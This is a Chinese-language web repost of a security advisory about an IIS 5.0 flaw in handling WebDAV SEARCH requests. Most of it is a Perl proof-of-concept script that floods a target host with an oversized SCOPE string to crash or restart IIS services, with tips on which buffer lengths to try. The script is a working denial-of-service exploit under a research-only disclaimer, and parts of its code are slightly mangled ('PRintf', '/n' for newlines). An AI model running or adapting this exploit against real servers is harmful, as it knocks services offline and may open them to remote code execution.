首页 > 学院 > 开发设计 > 正文

IIS 处理 SEARCH 请求漏洞

2019-11-18 21:05:35
字体:
来源:转载
供稿:网友
涉及程序:
IIS
  
描述:
通过构造特殊的 SEARCH 请求导致 IIS 执行攻击者代码漏洞
  
详细:
发现 IIS 在处理 SEARCH 请求时存在漏洞,攻击者通过提交构造特殊的 IIS SEARCH 请求能重启与 IIS 相关的所有服务,而且可能远程执行任意代码。

以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负



Details:
--vv6.pl-------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
PRintf "IIS 5.0 SEARCH/nWritten by Georgi Guninski wait some time/n";
if(@ARGV < 2) { die "/nUsage: IIS5host port /n"; }
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$_[0]; #length of buffer
$ch=$_[1];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
$over=$ch x $ll; #string to overflow
$xml='<?xml version="1.0"?><D:searchrequest xmlns:D="DAV:"><D:sql>SELECT DAV:displayname from SCOPE
("'.$over.'")</D:sql></D:searchrequest>'."/n";
$l=length($xml);
$req="SEARCH / HTTP/1.1/nContent-type: text/xml/nHost: $host/nContent-length: $l/n/n$xml/n/n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,3000);
print "r=".$res;
close $socket;
}
do vv(126000,"V");
sleep(1);
do vv(126000,"V");
#Try 125000 - 128000
---------------------------------------------------------------

受影响系统:
IIS 5.0  

发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表